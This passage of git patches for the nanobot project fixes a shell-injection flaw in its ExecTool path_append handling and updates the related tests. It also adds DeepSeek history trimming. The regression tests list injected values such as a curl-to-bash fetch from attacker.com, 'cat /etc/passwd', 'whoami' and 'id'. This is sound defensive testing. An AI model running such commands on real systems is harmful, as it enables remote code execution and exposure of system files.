→ stop - assert loop.consolidator.archive.await_count == 1 + assert loop.consolidator.archive.await_count == expected_archives -@pytest.mark.asyncio -async def test_ratio_propagated_from_config_schema() -> None: - """Verify consolidation_ratio is parsed from config with camelCase alias.""" - from nanobot.config.schema import AgentDefaults - - # Default +def test_ratio_propagated_from_config_schema() -> None: defaults = AgentDefaults() assert defaults.consolidation_ratio == 0.5 - # camelCase alias defaults = AgentDefaults.model_validate({"consolidationRatio": 0.3}) assert defaults.consolidation_ratio == 0.3 - # Serialization uses alias dumped = defaults.model_dump(by_alias=True) assert dumped["consolidationRatio"] == 0.3 -@pytest.mark.asyncio -async def test_ratio_validation_rejects_out_of_range() -> None: - """Invalid ratio values should be rejected by validation.""" - from pydantic import ValidationError - from nanobot.config.schema import AgentDefaults - +def test_ratio_validation_rejects_out_of_range() -> None: with pytest.raises(ValidationError): AgentDefaults(consolidation_ratio=0.05) From 23dde7b84ca4c4e20999d1982f5165000ac50351 Mon Sep 17 00:00:00 2001 From: yorkhellen Date: Wed, 22 Apr 2026 00:16:12 +0800 Subject: [PATCH 21/25] fix: prevent shell injection via path_append in ExecTool --- nanobot/agent/tools/shell.py | 5 +-- tests/tools/test_exec_env.py | 72 ++++++++++++++++++++++++++++++++++++ 2 files changed, 73 insertions(+), 4 deletions(-) diff --git a/nanobot/agent/tools/shell.py b/nanobot/agent/tools/shell.py index aa8ca67b1..78a2cc240 100644 --- a/nanobot/agent/tools/shell.py +++ b/nanobot/agent/tools/shell.py @@ -135,10 +135,7 @@ class ExecTool(Tool): env = self._build_env() if self.path_append: - if _IS_WINDOWS: - env["PATH"] = env.get("PATH", "") + ";" + self.path_append - else: - command = f'export PATH="$PATH:{self.path_append}"; {command}' + env["PATH"] = env.get("PATH", "") + os.pathsep + self.path_append try: process = await self._spawn(command, cwd, env) diff --git a/tests/tools/test_exec_env.py b/tests/tools/test_exec_env.py index 47b2c313d..b9567f29d 100644 --- a/tests/tools/test_exec_env.py +++ b/tests/tools/test_exec_env.py @@ -74,3 +74,75 @@ async def test_exec_allowed_env_keys_missing_var_ignored(monkeypatch): tool = ExecTool(allowed_env_keys=["NONEXISTENT_VAR_12345"]) result = await tool.execute(command="printenv NONEXISTENT_VAR_12345") assert "Exit code: 1" in result + + +# --- path_append injection prevention ------------------------------------ + + +@_UNIX_ONLY +@pytest.mark.asyncio +@pytest.mark.parametrize( + "malicious_path", + [ + # semicolon — classic command separator + '/tmp/bin; echo INJECTED', + # command substitution via $() + '/tmp/bin; echo $(whoami)', + # backtick command substitution + "/tmp/bin; echo `id`", + # pipe to another command + '/tmp/bin; cat /etc/passwd', + # chained with && + '/tmp/bin && curl http://attacker.com/shell.sh | bash', + # newline injection + '/tmp/bin\necho INJECTED', + # mixed shell metacharacters + '/tmp/bin; rm -rf /tmp/test_inject_marker; echo CLEANED', + ], +) +async def test_exec_path_append_shell_metacharacters_not_executed(malicious_path, tmp_path): + """Shell metacharacters in path_append must NOT be interpreted as commands. + + Regression test for: path_append was previously concatenated into a shell + command string via f'export PATH="$PATH:{path_append}"; {command}', which + allowed shell injection. After the fix, path_append is passed through the + env dict so metacharacters are treated as literal path characters. + """ + tool = ExecTool(path_append=malicious_path) + result = await tool.execute(command="echo SAFE_OUTPUT") + + # The original command should succeed + assert "SAFE_OUTPUT" in result + + # None of the injected payloads should have produced side-effects + assert "INJECTED" not in result + assert "root:" not in result # /etc/passwd content + + +@_UNIX_ONLY +@pytest.mark.asyncio +async def test_exec_path_append_command_substitution_does_not_execute(tmp_path): + """$() in path_append must not trigger command substitution. + + We create a marker file and try to read it via $(cat ...). If command + substitution works, the marker content appears in output. + """ + marker = tmp_path / "secret_marker.txt" + marker.write_text("SHOULD_NOT_APPEAR") + + tool = ExecTool( + path_append=f'/tmp/bin; echo $(cat {marker})', + ) + result = await tool.execute(command="echo OK") + + assert "OK" in result + assert "SHOULD_NOT_APPEAR" not in result + + +@_UNIX_ONLY +@pytest.mark.asyncio +async def test_exec_path_append_legitimate_path_still_works(): + """A normal, safe path_append value must still be appended to PATH.""" + tool = ExecTool(path_append="/opt/custom/bin") + result = await tool.execute(command="echo $PATH") + assert "/opt/custom/bin" in result From 2f2ac96ac7fbe1903a1122b11c30ddb5890b6c22 Mon Sep 17 00:00:00 2001 From: yorkhellen Date: Wed, 22 Apr 2026 08:48:53 +0800 Subject: [PATCH 22/25] fix: update tests for path_append env dict change --- nanobot/agent/tools/shell.py | 1 + tests/tools/test_exec_platform.py | 38 +++++++++++++++++++------------ 2 files changed, 25 insertions(+), 14 deletions(-) diff --git a/nanobot/agent/tools/shell.py b/nanobot/agent/tools/shell.py index 78a2cc240..08c584991 100644 --- a/nanobot/agent/tools/shell.py +++ b/nanobot/agent/tools/shell.py @@ -255,6 +255,7 @@ class ExecTool(Tool): home = os.environ.get("HOME", "/tmp") env = { "HOME": home, + "PATH": os.environ.get ("PATH", "/usr/bin:/bin"), "LANG": os.environ.get("LANG", "C.UTF-8"), "TERM": os.environ.get("TERM", "dumb"), } diff --git a/tests/tools/test_exec_platform.py b/tests/tools/test_exec_platform.py index b24d01ac4..e9922d2be 100644 --- a/tests/tools/test_exec_platform.py +++ b/tests/tools/test_exec_platform.py @@ -27,7 +27,7 @@ class TestBuildEnvUnix: def test_expected_keys(self): with patch("nanobot.agent.tools.shell._IS_WINDOWS", False): env = ExecTool()._build_env() - expected = {"HOME", "LANG", "TERM"} + expected = {"HOME", "LANG", "PATH","TERM"} assert expected <= set(env) if sys.platform != "win32": assert set(env) == expected @@ -148,23 +148,32 @@ class TestSpawnWindows: class TestPathAppendPlatform: @pytest.mark.asyncio - async def test_unix_injects_export(self): - """On Unix, path_append is an export statement prepended to command.""" - mock_proc = AsyncMock() + async def test_unix_injects_export (self): + """On Unix, path_append is passed via the env dict, not shell string.""" + mock_proc = AsyncMock () mock_proc.communicate.return_value = (b"ok", b"") mock_proc.returncode = 0 - with ( - patch("nanobot.agent.tools.shell._IS_WINDOWS", False), - patch.object(ExecTool, "_spawn", return_value=mock_proc) as mock_spawn, - patch.object(ExecTool, "_guard_command", return_value=None), - ): - tool = ExecTool(path_append="/opt/bin") - await tool.execute(command="ls") + captured_cmd = None + captured_env = {} - spawned_cmd = mock_spawn.call_args[0][0] - assert 'export PATH="$PATH:/opt/bin"' in spawned_cmd - assert spawned_cmd.endswith("ls") + async def capture_spawn (cmd, cwd, env): + nonlocal captured_cmd + captured_cmd = cmd + captured_env.update (env) + return mock_proc + + with ( + patch ("nanobot.agent.tools.shell._IS_WINDOWS", False), + patch.object (ExecTool, "_spawn", side_effect=capture_spawn), + patch.object (ExecTool, "_guard_command", return_value=None), + ): + tool = ExecTool (path_append="/opt/bin") + await tool.execute (command="ls") + + # path_append must be in the env dict, NOT injected into the command + assert captured_cmd == "ls" + assert captured_env["PATH"].endswith (":/opt/bin") @pytest.mark.asyncio async def test_windows_modifies_env(self): @@ -181,6 +190,7 @@ class TestPathAppendPlatform: with ( patch("nanobot.agent.tools.shell._IS_WINDOWS", True), + patch ("nanobot.agent.tools.shell.os.pathsep", ";"), patch.object(ExecTool, "_spawn", side_effect=capture_spawn), patch.object(ExecTool, "_guard_command", return_value=None), ): From 814345dd7838375f35e2a289b41c13c5de8ad50c Mon Sep 17 00:00:00 2001 From: yorkhellen Date: Wed, 22 Apr 2026 09:05:19 +0800 Subject: [PATCH 23/25] fix: update tests for path_append env dict change --- tests/tools/test_exec_platform.py | 1 + 1 file changed, 1 insertion(+) diff --git a/tests/tools/test_exec_platform.py b/tests/tools/test_exec_platform.py index e9922d2be..47f872ebc 100644 --- a/tests/tools/test_exec_platform.py +++ b/tests/tools/test_exec_platform.py @@ -165,6 +165,7 @@ class TestPathAppendPlatform: with ( patch ("nanobot.agent.tools.shell._IS_WINDOWS", False), + patch ("nanobot.agent.tools.shell.os.pathsep", ":"), patch.object (ExecTool, "_spawn", side_effect=capture_spawn), patch.object (ExecTool, "_guard_command", return_value=None), ): From 3b82e14f851678db56cd571520e43f959108853c Mon Sep 17 00:00:00 2001 From: Xubin Ren Date: Sun, 26 Apr 2026 12:27:31 +0000 Subject: [PATCH 24/25] fix(shell): preserve login PATH for path append Made-with: Cursor --- nanobot/agent/tools/shell.py | 11 +++++++---- tests/tools/test_exec_platform.py | 32 +++++++++++++++---------------- 2 files changed, 23 insertions(+), 20 deletions(-) diff --git a/nanobot/agent/tools/shell.py b/nanobot/agent/tools/shell.py index 08c584991..9484c73f7 100644 --- a/nanobot/agent/tools/shell.py +++ b/nanobot/agent/tools/shell.py @@ -135,7 +135,11 @@ class ExecTool(Tool): env = self._build_env() if self.path_append: - env["PATH"] = env.get("PATH", "") + os.pathsep + self.path_append + if _IS_WINDOWS: + env["PATH"] = env.get("PATH", "") + os.pathsep + self.path_append + else: + env["NANOBOT_PATH_APPEND"] = self.path_append + command = f'export PATH="$PATH{os.pathsep}$NANOBOT_PATH_APPEND"; {command}' try: process = await self._spawn(command, cwd, env) @@ -255,7 +259,6 @@ class ExecTool(Tool): home = os.environ.get("HOME", "/tmp") env = { "HOME": home, - "PATH": os.environ.get ("PATH", "/usr/bin:/bin"), "LANG": os.environ.get("LANG", "C.UTF-8"), "TERM": os.environ.get("TERM", "dumb"), } @@ -296,8 +299,8 @@ class ExecTool(Tool): continue media_path = get_media_dir().resolve() - if (p.is_absolute() - and cwd_path not in p.parents + if (p.is_absolute() + and cwd_path not in p.parents and p != cwd_path and media_path not in p.parents and p != media_path diff --git a/tests/tools/test_exec_platform.py b/tests/tools/test_exec_platform.py index 47f872ebc..b3d7f4c18 100644 --- a/tests/tools/test_exec_platform.py +++ b/tests/tools/test_exec_platform.py @@ -27,7 +27,7 @@ class TestBuildEnvUnix: def test_expected_keys(self): with patch("nanobot.agent.tools.shell._IS_WINDOWS", False): env = ExecTool()._build_env() - expected = {"HOME", "LANG", "PATH","TERM"} + expected = {"HOME", "LANG", "TERM"} assert expected <= set(env) if sys.platform != "win32": assert set(env) == expected @@ -148,33 +148,33 @@ class TestSpawnWindows: class TestPathAppendPlatform: @pytest.mark.asyncio - async def test_unix_injects_export (self): - """On Unix, path_append is passed via the env dict, not shell string.""" - mock_proc = AsyncMock () + async def test_unix_uses_env_var_in_fixed_export(self): + """On Unix, path_append must not be interpolated into shell source.""" + mock_proc = AsyncMock() mock_proc.communicate.return_value = (b"ok", b"") mock_proc.returncode = 0 captured_cmd = None captured_env = {} - async def capture_spawn (cmd, cwd, env): + async def capture_spawn(cmd, cwd, env): nonlocal captured_cmd captured_cmd = cmd - captured_env.update (env) + captured_env.update(env) return mock_proc with ( - patch ("nanobot.agent.tools.shell._IS_WINDOWS", False), - patch ("nanobot.agent.tools.shell.os.pathsep", ":"), - patch.object (ExecTool, "_spawn", side_effect=capture_spawn), - patch.object (ExecTool, "_guard_command", return_value=None), + patch("nanobot.agent.tools.shell._IS_WINDOWS", False), + patch("nanobot.agent.tools.shell.os.pathsep", ":"), + patch.object(ExecTool, "_spawn", side_effect=capture_spawn), + patch.object(ExecTool, "_guard_command", return_value=None), ): - tool = ExecTool (path_append="/opt/bin") - await tool.execute (command="ls") + tool = ExecTool(path_append="/opt/bin; echo INJECTED") + await tool.execute(command="ls") - # path_append must be in the env dict, NOT injected into the command - assert captured_cmd == "ls" - assert captured_env["PATH"].endswith (":/opt/bin") + assert captured_cmd == 'export PATH="$PATH:$NANOBOT_PATH_APPEND"; ls' + assert captured_env["NANOBOT_PATH_APPEND"] == "/opt/bin; echo INJECTED" + assert "INJECTED" not in captured_cmd @pytest.mark.asyncio async def test_windows_modifies_env(self): @@ -191,7 +191,7 @@ class TestPathAppendPlatform: with ( patch("nanobot.agent.tools.shell._IS_WINDOWS", True), - patch ("nanobot.agent.tools.shell.os.pathsep", ";"), + patch("nanobot.agent.tools.shell.os.pathsep", ";"), patch.object(ExecTool, "_spawn", side_effect=capture_spawn), patch.object(ExecTool, "_guard_command", return_value=None), ): From 82b8a3af7e1a73baf0930d1ae27138edc8aecbfb Mon Sep 17 00:00:00 2001 From: Xubin Ren Date: Sun, 26 Apr 2026 12:47:09 +0000 Subject: [PATCH 25/25] fix(provider): handle incomplete DeepSeek reasoning history --- nanobot/providers/openai_compat_provider.py | 45 +++++++++++++ tests/providers/test_litellm_kwargs.py | 75 +++++++++++++++++++++ 2 files changed, 120 insertions(+) diff --git a/nanobot/providers/openai_compat_provider.py b/nanobot/providers/openai_compat_provider.py index 558093822..fdbad585c 100644 --- a/nanobot/providers/openai_compat_provider.py +++ b/nanobot/providers/openai_compat_provider.py @@ -384,6 +384,47 @@ class OpenAICompatProvider(LLMProvider): clean["tool_call_id"] = map_id(clean["tool_call_id"]) return self._enforce_role_alternation(sanitized) + def _drop_deepseek_incomplete_reasoning_history( + self, + messages: list[dict[str, Any]], + reasoning_effort: str | None, + ) -> list[dict[str, Any]]: + if ( + not self._spec + or self._spec.name != "deepseek" + or not reasoning_effort + or reasoning_effort.lower() == "none" + ): + return messages + + bad_idx = None + for idx, msg in enumerate(messages): + if ( + msg.get("role") == "assistant" + and msg.get("tool_calls") + and not msg.get("reasoning_content") + ): + bad_idx = idx + if bad_idx is None: + return messages + + keep_from = None + for idx in range(bad_idx + 1, len(messages)): + if messages[idx].get("role") == "user": + keep_from = idx + break + + if keep_from is None: + trimmed = messages[:bad_idx] + else: + prefix = [msg for msg in messages[:keep_from] if msg.get("role") == "system"] + trimmed = prefix + messages[keep_from:] + logger.warning( + "Dropped {} DeepSeek thinking history message(s) with incomplete reasoning_content", + len(messages) - len(trimmed), + ) + return trimmed + # ------------------------------------------------------------------ # Build kwargs # ------------------------------------------------------------------ @@ -424,6 +465,10 @@ class OpenAICompatProvider(LLMProvider): if spec and spec.strip_model_prefix: model_name = model_name.split("/")[-1] + messages = self._drop_deepseek_incomplete_reasoning_history( + messages, + reasoning_effort, + ) kwargs: dict[str, Any] = { "model": model_name, "messages": self._sanitize_messages(self._sanitize_empty_content(messages)), diff --git a/tests/providers/test_litellm_kwargs.py b/tests/providers/test_litellm_kwargs.py index dfa0f58ac..1c3cfb851 100644 --- a/tests/providers/test_litellm_kwargs.py +++ b/tests/providers/test_litellm_kwargs.py @@ -585,6 +585,81 @@ def test_openai_compat_preserves_message_level_reasoning_fields() -> None: assert sanitized[1]["tool_calls"][0]["extra_content"] == {"google": {"thought_signature": "sig"}} +def _deepseek_kwargs(messages: list[dict]) -> dict: + with patch("nanobot.providers.openai_compat_provider.AsyncOpenAI"): + provider = OpenAICompatProvider( + api_key="sk-test", + default_model="deepseek-v4-flash", + spec=find_by_name("deepseek"), + ) + + return provider._build_kwargs( + messages=messages, + tools=None, + model="deepseek-v4-flash", + max_tokens=1024, + temperature=0.7, + reasoning_effort="high", + tool_choice=None, + ) + + +def _tool_call(call_id: str) -> dict: + return { + "id": call_id, + "type": "function", + "function": {"name": "my", "arguments": "{}"}, + } + + +def test_deepseek_thinking_drops_tool_history_missing_reasoning_content() -> None: + kwargs = _deepseek_kwargs([ + {"role": "system", "content": "system"}, + {"role": "user", "content": "can we use wechat?"}, + {"role": "assistant", "content": "", "tool_calls": [_tool_call("call_bad")]}, + {"role": "tool", "tool_call_id": "call_bad", "name": "my", "content": "channels"}, + {"role": "user", "content": "continue"}, + ]) + + assert kwargs["messages"] == [ + {"role": "system", "content": "system"}, + {"role": "user", "content": "continue"}, + ] + + +def test_deepseek_thinking_keeps_tool_history_with_reasoning_content() -> None: + kwargs = _deepseek_kwargs([ + {"role": "user", "content": "can we use wechat?"}, + { + "role": "assistant", + "content": "", + "reasoning_content": "I should inspect supported channels.", + "tool_calls": [_tool_call("call_good")], + }, + {"role": "tool", "tool_call_id": "call_good", "name": "my", "content": "channels"}, + {"role": "user", "content": "continue"}, + ]) + + assistant = kwargs["messages"][1] + assert assistant["role"] == "assistant" + assert assistant["reasoning_content"] == "I should inspect supported channels." + assert kwargs["messages"][2]["role"] == "tool" + + +def test_deepseek_thinking_drops_current_bad_tool_turn_without_followup_user() -> None: + kwargs = _deepseek_kwargs([ + {"role": "system", "content": "system"}, + {"role": "user", "content": "can we use wechat?"}, + {"role": "assistant", "content": "", "tool_calls": [_tool_call("call_bad")]}, + {"role": "tool", "tool_call_id": "call_bad", "name": "my", "content": "channels"}, + ]) + + assert kwargs["messages"] == [ + {"role": "system", "content": "system"}, + {"role": "user", "content": "can we use wechat?"}, + ] + + def test_openai_compat_keeps_tool_calls_after_consecutive_assistant_messages() -> None: with patch("nanobot.providers.openai_compat_provider.AsyncOpenAI"): provider = OpenAICompatProvider()